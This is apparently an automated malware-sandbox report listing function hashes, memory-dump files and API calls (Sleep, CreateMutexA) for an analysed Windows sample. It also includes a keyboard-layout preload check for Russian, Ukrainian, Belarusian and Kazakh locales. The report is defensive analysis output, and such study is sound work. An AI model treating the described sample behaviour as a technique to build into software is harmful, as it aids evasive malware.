Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: ecab46ca028f115ff0512e5370be8b208f6447f6e6b099eee194db1e9ec95f7a
Instruction ID: c5b75e2fc15e4a793a0abd32edf6388cab4d39a76c33555c5df4ccfced5ff6c7
Opcode Fuzzy Hash: ecab46ca028f115ff0512e5370be8b208f6447f6e6b099eee194db1e9ec95f7a
Instruction Fuzzy Hash: BDF1D27090025C9FEB24DF58CC85BDEBBB9FB45304F5042A8F918E7281DB749A98CB91

Function 00859BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0085A963
CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: b346de9c9a1efbadaa8319dc140fb85fc792d8bea2c2910554468f86f0e0f4f0
Instruction ID: 9ab7dd7cda47854d6a497aa5671b58cda56286f6cb383a45a5f351e2da5e35d5
Opcode Fuzzy Hash: b346de9c9a1efbadaa8319dc140fb85fc792d8bea2c2910554468f86f0e0f4f0
Instruction Fuzzy Hash: F8311871704204DBFB089B6CDCC97AEBB62FB91322F244318E854D73D5C77599888752

Function 00859F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0085A963
CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 1417903dc5fea86a2f89c26e69d2bbf15e17f1a55c33d6d9046b0de1b874cd1a
Instruction ID: 5c8915b6530ddd5fdadf2459a3fc96f47fce1ebb0321c2f578ceaa931598aa9c
Opcode Fuzzy Hash: 1417903dc5fea86a2f89c26e69d2bbf15e17f1a55c33d6d9046b0de1b874cd1a
Instruction Fuzzy Hash: 3E314631700204CBEF0C9B68DCC9BADBB62FF85312F204719E824E72D1CB7699888752

Function 0085A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0085A963
CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: da76a887135d3087f530284a0d250fbee88068277971fd45f3580af489e806cb
Instruction ID: 24fca616f46e90e2fc2be764fa89c3de9a061fbb7b1c04a4fb5cc36d22935b4f
Opcode Fuzzy Hash: da76a887135d3087f530284a0d250fbee88068277971fd45f3580af489e806cb
Instruction Fuzzy Hash: 873148317502049BEB0C9B78DCC9BADBB62FB91312F204319E825D73D1C77699888753

Function 0085A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0085A963
CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 06e8515bbbce8dd271f2304a89b0ecd0ee82575975d1f37ac34f33c598b467e9
Instruction ID: a6c4b778055892b4b4496365312681c7a958de92ac1f615b7bbd2fd599663e8e
Opcode Fuzzy Hash: 06e8515bbbce8dd271f2304a89b0ecd0ee82575975d1f37ac34f33c598b467e9
Instruction Fuzzy Hash: 4C312631B002449BFB0C9B7CDCC9BADBB62FB96312F244719E814E72D1D77699888752

Function 0085A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0085A963
CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
